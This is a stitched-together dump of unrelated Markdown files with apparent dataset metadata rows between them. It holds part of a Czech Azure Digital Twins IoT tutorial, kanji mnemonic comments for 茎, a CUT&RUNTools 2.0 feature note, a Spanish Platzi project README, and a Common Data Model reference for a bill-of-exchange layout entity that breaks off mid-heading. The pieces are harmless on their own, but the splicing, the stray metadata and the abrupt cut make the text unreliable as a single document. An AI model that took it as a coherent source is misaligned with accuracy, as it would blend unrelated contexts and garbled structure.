V této části vytvoříte funkci Azure pro přístup k digitálním událostem Azure a budete moct aktualizovat vlákna na základě událostí telemetrie IoT, které obdrží. Pomocí následujících kroků vytvořte a publikujte funkci.
#### <a name="step-1-create-a-function-app-project"></a>Krok 1: vytvoření projektu Function App
Nejprve v aplikaci Visual Studio vytvořte nový projekt aplikace Function App. Pokyny k tomu, jak to provést, naleznete v části [**Vytvoření aplikace Function App v sadě Visual Studio**](how-to-create-azure-function.md#create-a-function-app-in-visual-studio) tématu *Postupy: nastavení funkce pro zpracování dat* v článku.
#### <a name="step-2-fill-in-function-code"></a>Krok 2: vyplnění kódu funkce
Přidejte do projektu následující balíčky:
* [Azure. DigitalTwins. Core](https://www.nuget.org/packages/Azure.DigitalTwins.Core/)
* [Azure. identity](https://www.nuget.org/packages/Azure.Identity/)
* [Microsoft. Azure. WebJobs. Extensions. EventGrid](https://www.nuget.org/packages/Microsoft.Azure.WebJobs.Extensions.EventGrid/)
Přejmenujte ukázkovou funkci *function1. cs* , kterou Visual Studio vygenerovalo s novým projektem na *IoTHubtoTwins. cs*. Nahraďte kód v souboru následujícím kódem:
:::code language="csharp" source="~/digital-twins-docs-samples/sdks/csharp/IoTHubToTwins.cs":::
Uložte kód funkce.
#### <a name="step-3-publish-the-function-app-to-azure"></a>Krok 3: publikování aplikace Function App do Azure
Publikujte projekt pomocí funkce *IoTHubtoTwins. cs* do aplikace Function App v Azure.
Pokyny k tomu, jak to provést, najdete v části [**publikování aplikace Function App do Azure**](how-to-create-azure-function.md#publish-the-function-app-to-azure) tématu *Postupy: nastavení funkce pro zpracování dat* v článku.
#### <a name="step-4-configure-the-function-app"></a>Krok 4: Konfigurace aplikace Function App
Dále přiřaďte k této funkci **roli přístupu** a **nakonfigurujte nastavení aplikace** tak, aby měla přístup k instanci digitálních vláken Azure. Pokyny k tomu, jak to provést, najdete v části [**nastavení přístupu zabezpečení pro aplikaci Function App**](how-to-create-azure-function.md#set-up-security-access-for-the-function-app) tématu *Postupy: nastavení funkce pro zpracování dat* v článku.
## <a name="connect-your-function-to-iot-hub"></a>Připojte funkci k IoT Hub
V této části nastavíte funkci jako cíl události pro data zařízení služby IoT Hub. Tím se zajistí, že se data ze zařízení z termostatu v IoT Hub pošlou službě Azure Function za účelem zpracování.
V [Azure Portal](https://portal.azure.com/)přejděte na instanci IoT Hub, kterou jste vytvořili v části [*požadavky*](#prerequisites) . V části **události** Vytvořte předplatné pro vaši funkci.
:::image type="content" source="media/how-to-ingest-iot-hub-data/add-event-subscription.png" alt-text="Snímek obrazovky Azure Portal, který ukazuje přidání odběru události":::
Na stránce **vytvořit odběr události** vyplňte pole následujícím způsobem:
1. Pro položku **název** vyberte libovolný název pro odběr události.
2. V případě **schématu událostí** vyberte možnost _Event Grid schéma_.
3. V **části název systémového tématu** vyberte libovolný požadovaný název.
1. Pro **Filtr na typy událostí** vyberte zaškrtávací políčko _telemetrie zařízení_ a zrušte zaškrtnutí ostatních typů událostí.
1. Jako **Typ koncového bodu** vyberte _Azure Function_.
1. V případě **koncového bodu** použijte odkaz _Vybrat koncový bod_ a zvolte, kterou funkci Azure použít pro koncový bod.
:::image type="content" source="media/how-to-ingest-iot-hub-data/create-event-subscription.png" alt-text="Snímek obrazovky Azure Portal k vytvoření podrobností odběru události":::
Na stránce _Vybrat funkci Azure_ , která se otevře, ověřte nebo vyplňte následující podrobnosti.
1. **Předplatné**: vaše předplatné Azure.
2. **Skupina prostředků**: vaše skupina prostředků.
3. **Function App**: název aplikace Function App.
4. **Slot**: _Výroba_.
5. **Funkce**: v rozevíracím seznamu vyberte funkci z předchozí *IoTHubtoTwins*.
Uložte podrobnosti pomocí tlačítka _potvrdit výběr_ .
:::image type="content" source="media/how-to-ingest-iot-hub-data/select-azure-function.png" alt-text="Snímek obrazovky Azure Portal pro výběr funkce":::
Kliknutím na tlačítko _vytvořit_ Vytvořte odběr události.
## <a name="send-simulated-iot-data"></a>Odeslat Simulovaná data IoT
Pokud chcete otestovat novou funkci příchozího přenosu dat, použijte simulátor zařízení z [*kurzu: připojení kompletního řešení*](./tutorial-end-to-end.md). Tento kurz se řídí ukázkovým projektem napsaným v jazyce C#. Vzorový kód je umístěný tady: [Azure Digital dokončí ukázky](/samples/azure-samples/digital-twins-samples/digital-twins-samples). V tomto úložišti budete používat projekt **DeviceSimulator** .
V tomto koncovém kurzu proveďte následující kroky:
1. [*Zaregistrujte simulované zařízení s IoT Hub*](./tutorial-end-to-end.md#register-the-simulated-device-with-iot-hub)
2. [*Konfigurace a spuštění simulace*](./tutorial-end-to-end.md#configure-and-run-the-simulation)
## <a name="validate-your-results"></a>Ověřit výsledky
Při současném spuštění simulátoru zařízení se změní hodnota teplota digitálního vlákna. V Azure CLI spuštěním následujícího příkazu zobrazte hodnotu teploty.
```azurecli-interactive
az dt twin query -q "select * from digitaltwins" -n {digital_twins_instance_name}
```
Výstup by měl obsahovat hodnotu teploty, například:
```json
{
"result": [
{
"$dtId": "thermostat67",
"$etag": "W/\"0000000-1e83-4f7f-b448-524371f64691\"",
"$metadata": {
"$model": "dtmi:contosocom:DigitalTwins:Thermostat;1",
"Temperature": {
"ackCode": 200,
"ackDescription": "Auto-Sync",
"ackVersion": 1,
"desiredValue": 69.75806974934324,
"desiredVersion": 1
}
},
"Temperature": 69.75806974934324
}
]
}
```
Chcete-li zobrazit změnu hodnoty, opakovaně spusťte příkaz dotazu výše.
## <a name="next-steps"></a>Další kroky
Přečtěte si o příchozím a odchozím přenosu dat pomocí digitálních vláken Azure:
* [*Koncepty: integrace s jinými službami*](concepts-integration.md)
| 57.782383 | 410 | 0.765065 | ces_Latn | 0.999313 |
e052a50968546c6e9ef86de2670b654011217e95 | 2,046 | md | Markdown | rtk/rtk1-v6/0772.md | hochanh/hochanh.github.io | 755d537144c230fd29ba84951b8533f5476a79d9 | [
"Apache-2.0"
] | 1 | 2021-03-30T18:58:12.000Z | 2021-03-30T18:58:12.000Z | rtk/rtk1-v6/0772.md | hochanh/hochanh.github.io | 755d537144c230fd29ba84951b8533f5476a79d9 | [
"Apache-2.0"
] | null | null | null | rtk/rtk1-v6/0772.md | hochanh/hochanh.github.io | 755d537144c230fd29ba84951b8533f5476a79d9 | [
"Apache-2.0"
] | null | null | null | ---
layout: kanji
v4: 715
v6: 772
kanji: 茎
keyword: stalk
elements: stalk, flowers, spool, clod, toilet paper, crotch, soil, dirt, ground
strokes: 8
image: E88C8E
on-yomi: ケイ、キョウ
kun-yomi: くき
permalink: /rtk/茎/
prev: 肢
next: 怪
---
1) [<a href="http://kanji.koohii.com/profile/Katsuo">Katsuo</a>] 18-2-2008(196): Suggestion: Replace "spool" with "toilet paper/roll". Reasons: (1) <em>Toilet paper/roll</em> usually comes on a <em>spool</em>. (2) <em>Toilet paper</em> is used to clean the <em>soil</em> off your <em>crotch</em>. Story: Just get a <em>flower</em> and carefully wrap some <em>toilet paper</em> around its<strong> stalk</strong>. Spool also appears in <a href="../v4/716.html">suspicious</a> (#716 怪), <a href="../v4/717.html">lightly</a> (#717 軽), <a href="../v4/882.html">diameter</a> (#882 径), <a href="../v4/1360.html">sutra</a> (#1360 経).
2) [<a href="http://kanji.koohii.com/profile/dingomick">dingomick</a>] 9-8-2007(130): PRIMITIVE: <em>soiled crotch</em> = <em>soiled underwear</em>. To precent anyone from picking the beautiful <em>flower</em>, the gardner hung <em>soiled underwear</em> on the <strong>stalk</strong>.
3) [<a href="http://kanji.koohii.com/profile/nac_est">nac_est</a>] 24-7-2007(83): A <em>flower</em>'s<strong> stalk</strong> can be seen as connecting the <em>flower</em> to the <em>soil</em>, <em>or again</em> the <em>soil</em> to the <em>flower</em>. It depends on how you look at it.
4) [<a href="http://kanji.koohii.com/profile/uberclimber">uberclimber</a>] 15-10-2010(62): Jack and the Bean<strong>stalk</strong>: <em>dirt</em> below, <em>flowers</em> above, and Jack's <em>crotch</em> visible as he climbs up and up. 茎 (くき) :<strong> stalk</strong>.
5) [<a href="http://kanji.koohii.com/profile/ihatobu">ihatobu</a>] 16-9-2007(30): Flowering vines growing up a post or column. The<strong> stalk</strong>s wrap around the post-- again and again-- like a <em>spool </em>of thread, and <em>flowers</em> bloom at the very top. At the bottom, of course, is the soil.
| 75.777778 | 645 | 0.686217 | eng_Latn | 0.512551 |
e05387b51d62505f72856446d97438b73873efb4 | 2,246 | md | Markdown | docs/bulk-news.md | dklcdbi/CUT-RUNTools-2.0 | c5b98798c586f84a2feee18ad21002d90d01ce35 | [
"MIT"
] | null | null | null | docs/bulk-news.md | dklcdbi/CUT-RUNTools-2.0 | c5b98798c586f84a2feee18ad21002d90d01ce35 | [
"MIT"
] | null | null | null | docs/bulk-news.md | dklcdbi/CUT-RUNTools-2.0 | c5b98798c586f84a2feee18ad21002d90d01ce35 | [
"MIT"
] | null | null | null |
#### New features for bulk data analysis
In this release, we provided several new features in the following which are urgently needed from the feedback of the community. Also, we slightly revised the design of our code to be more flexible and user-friendly for data processing and analysis.
- *supporting spike-in sequence alignment and data normalization*
Users can provide spike-in genome data (usually E.coli or fly genome) to align their fastq data. The statistic of aligned spike-in reads can be used for normalization of CUT&RUN or CUT&Tag
- *option of the experiment for CUT&RUN or CUT&Tag data analysis*
Different enzymes are used in CUT&RUN (pAG-MNase) and CUT&Tag (Tn5) experiments. Although the overall peak calling strategies for these two types of data are basically the same, footprinting should be different. CUT&Tag reads should be shifted + 4 bp and − 5 bp for positive and negative strand respectively, to account for the 9-bp duplication created by DNA repair of the nick by Tn5 transposase and achieve base-pair resolution of TF footprint and motif-related analyses. CUT&RUN 2.0 now provides a new option for the user to make precise cut profiles for footprint analysis of different experiments.
- *flexible option for fragments selections (>120bp)*
Reads filter step (size 120 bp) is good to find the enriched signal for TF data, while it is not suitable for histone modification data whose fragment size generally large than 150 bp. CUT&RUN 2.0 now provides a new option for the user to select whether to perform this fragment selection according to their data type.
- *different peak calling strategies and new functions for peaks annotation*
As different types of data including different TFs and histone modifications can be broadly detected by CUT&RUN and CUT&Tag methods, three commonly used peak calling methods including MACS2 narrow, MACS2 broad and SEACR were provided in CUT&RUN 2.0. Several peak annotation functions were also provided (user could find them in the /src/bulk folder).
- *compatible with more computational platforms*
To compatible with more computational platforms for bulk data analysis, the requirement of the SLURM job submission environment was removed.
| 132.117647 | 607 | 0.79252 | eng_Latn | 0.999326 |
e053dac59fe75ba8e9b9e55992ee6f1ddcaee0b2 | 798 | md | Markdown | README.md | jotak08/BATABIT | 8d1ff915b643a693531e51bdaef3ca2feb6b38ae | [
"MIT"
] | 1 | 2022-01-10T20:26:24.000Z | 2022-01-10T20:26:24.000Z | README.md | jotak08/BATABIT | 8d1ff915b643a693531e51bdaef3ca2feb6b38ae | [
"MIT"
] | null | null | null | README.md | jotak08/BATABIT | 8d1ff915b643a693531e51bdaef3ca2feb6b38ae | [
"MIT"
] | null | null | null | <a href="https://github.com/jotak08/BATABIT"><img src="https://i.ibb.co/8Pc5SCr/Group-19.png" alt="Group-19" border="0"></a>
------------
###### Este proyecto fue realizado y orientado por las clases aprendidas del [Curso de Responsive Design: Maquetación Mobile First](https://platzi.com/clases/mobile-first/ "Clases del Curso de Responsive Design: Maquetación Mobile First") de la ESCUELA DE DESARROLLO WEB de [Platzi](https://platzi.com/home "Platzi").
###### - Se creó el frontend de un sitio web partiendo de su wireframe, analizando su arquitectura y construyendo en código cada una de sus partes para que este se adapte a cualquier dispositivo de los usuarios.
------------
###### Los temas y skills aprendidos en este curso son:
- **HTML**
- **CSS**
- **FLEXBOX**
- **MEDIA QUERIES**
| 46.941176 | 317 | 0.705514 | spa_Latn | 0.957227 |
e053f2ddea84b4332353a3b2b4e8276104b334e3 | 23,401 | md | Markdown | common-data-model/schema/core/operationsCommon/Entities/Finance/CashAndBankManagement/BankBillOfExchangeLayoutEntity.md | FabianMSFT/common-data-model-and-service | ca72e2eee6c96e1c55e2b3804459d110082e646b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | common-data-model/schema/core/operationsCommon/Entities/Finance/CashAndBankManagement/BankBillOfExchangeLayoutEntity.md | FabianMSFT/common-data-model-and-service | ca72e2eee6c96e1c55e2b3804459d110082e646b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | common-data-model/schema/core/operationsCommon/Entities/Finance/CashAndBankManagement/BankBillOfExchangeLayoutEntity.md | FabianMSFT/common-data-model-and-service | ca72e2eee6c96e1c55e2b3804459d110082e646b | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: BankBillOfExchangeLayoutEntity in CashAndBankManagement - Common Data Model | Microsoft Docs
description: undefined
author: llawwaii
ms.reviewer: deonhe
ms.topic: article
ms.date: 8/7/2020
ms.author: weiluo
---
# Bill of exchange layout in CashAndBankManagement(BankBillOfExchangeLayoutEntity)
Latest version of the JSON entity definition is available on <a href="https://github.com/Microsoft/CDM/tree/master/schemaDocuments/core/operationsCommon/Entities/Finance/CashAndBankManagement/BankBillOfExchangeLayoutEntity.cdm.json" target="_blank">GitHub</a>.
## Traits
<details>
<summary>Traits for this entity are listed below.
</summary>
**is.CDM.entityVersion**
<table><tr><th>Parameter</th><th>Value</th><th>Data type</th><th>Explanation</th></tr><tr><td>versionNumber</td><td>"1.1"</td><td>string</td><td>semantic version number of the entity</td></tr></table>
**is.application.releaseVersion**
<table><tr><th>Parameter</th><th>Value</th><th>Data type</th><th>Explanation</th></tr><tr><td>releaseVersion</td><td>"10.0.13.0"</td><td>string</td><td>semantic version number of the application introducing this entity</td></tr></table>
**is.localized.displayedAs**
Holds the list of language specific display text for an object. <table><tr><th>Parameter</th><th>Value</th><th>Data type</th><th>Explanation</th></tr><tr><td>localizedDisplayText</td><td><table><tr><th>languageTag</th><th>displayText</th></tr><tr><td>en</td><td>Bill of exchange layout</td></tr></table></td><td>entity</td><td>a reference to the constant entity holding the list of localized text</td></tr></table>
</details>
## Attributes
|Name|Description|First Included in Instance|
|---|---|---|
|[AmountPrefix](#AmountPrefix)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintBankAccount](#PrintBankAccount)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[BankAccountId](#BankAccountId)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintBankCity](#PrintBankCity)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintBankName](#PrintBankName)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintBankNumber](#PrintBankNumber)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintCompanyLogo](#PrintCompanyLogo)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintCompanyName](#PrintCompanyName)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintDueDate](#PrintDueDate)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[FormatType](#FormatType)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[NumberMethod](#NumberMethod)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[StartPositionUnit](#StartPositionUnit)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[NumberOfSlipCopies](#NumberOfSlipCopies)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[StartPosition](#StartPosition)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PaperLength](#PaperLength)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PaperLengthUnit](#PaperLengthUnit)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintFirstSignature](#PrintFirstSignature)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[FirstSignatureAmountLimit](#FirstSignatureAmountLimit)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintSecondSignature](#PrintSecondSignature)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[SecondSignatureAmountLimit](#SecondSignatureAmountLimit)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[PrintTransactionDate](#PrintTransactionDate)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[Relationship_BankAccountRelationshipId](#Relationship_BankAccountRelationshipId)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[BackingTable_BankBillOfExchangeLayoutRelationshipId](#BackingTable_BankBillOfExchangeLayoutRelationshipId)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
|[Relationship_PrimaryCompanyContextRelationshipId](#Relationship_PrimaryCompanyContextRelationshipId)||<a href="BankBillOfExchangeLayoutEntity.md" target="_blank">CashAndBankManagement/BankBillOfExchangeLayoutEntity</a>|
### <a href=#AmountPrefix name="AmountPrefix">AmountPrefix</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the AmountPrefix attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintBankAccount name="PrintBankAccount">PrintBankAccount</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintBankAccount attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#BankAccountId name="BankAccountId">BankAccountId</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the BankAccountId attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintBankCity name="PrintBankCity">PrintBankCity</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintBankCity attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintBankName name="PrintBankName">PrintBankName</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintBankName attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintBankNumber name="PrintBankNumber">PrintBankNumber</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintBankNumber attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintCompanyLogo name="PrintCompanyLogo">PrintCompanyLogo</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintCompanyLogo attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintCompanyName name="PrintCompanyName">PrintCompanyName</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintCompanyName attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintDueDate name="PrintDueDate">PrintDueDate</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintDueDate attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#FormatType name="FormatType">FormatType</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the FormatType attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#NumberMethod name="NumberMethod">NumberMethod</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the NumberMethod attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#StartPositionUnit name="StartPositionUnit">StartPositionUnit</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the StartPositionUnit attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#NumberOfSlipCopies name="NumberOfSlipCopies">NumberOfSlipCopies</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the NumberOfSlipCopies attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#StartPosition name="StartPosition">StartPosition</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the StartPosition attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PaperLength name="PaperLength">PaperLength</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PaperLength attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PaperLengthUnit name="PaperLengthUnit">PaperLengthUnit</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PaperLengthUnit attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintFirstSignature name="PrintFirstSignature">PrintFirstSignature</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintFirstSignature attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#FirstSignatureAmountLimit name="FirstSignatureAmountLimit">FirstSignatureAmountLimit</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the FirstSignatureAmountLimit attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintSecondSignature name="PrintSecondSignature">PrintSecondSignature</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintSecondSignature attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#SecondSignatureAmountLimit name="SecondSignatureAmountLimit">SecondSignatureAmountLimit</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the SecondSignatureAmountLimit attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#PrintTransactionDate name="PrintTransactionDate">PrintTransactionDate</a>
First included in: CashAndBankManagement/BankBillOfExchangeLayoutEntity (this entity)
#### Properties
<table><tr><th>Name</th><th>Value</th></tr><tr><td>dataFormat</td><td>string</td></tr><tr><td>isNullable</td><td>true</td></tr></table>
#### Traits
<details>
<summary>List of traits for the PrintTransactionDate attribute are listed below.</summary>
**is.dataFormat.character**
**is.dataFormat.big**
**is.dataFormat.array**
**is.nullable**
The attribute value may be set to NULL.
**is.dataFormat.character**
**is.dataFormat.array**
</details>
### <a href=#Relationship_BankAccountRelationshipId name="Relationship_BankAccountRelationshipId">Relationship_BankAccountRelationshipId</a>
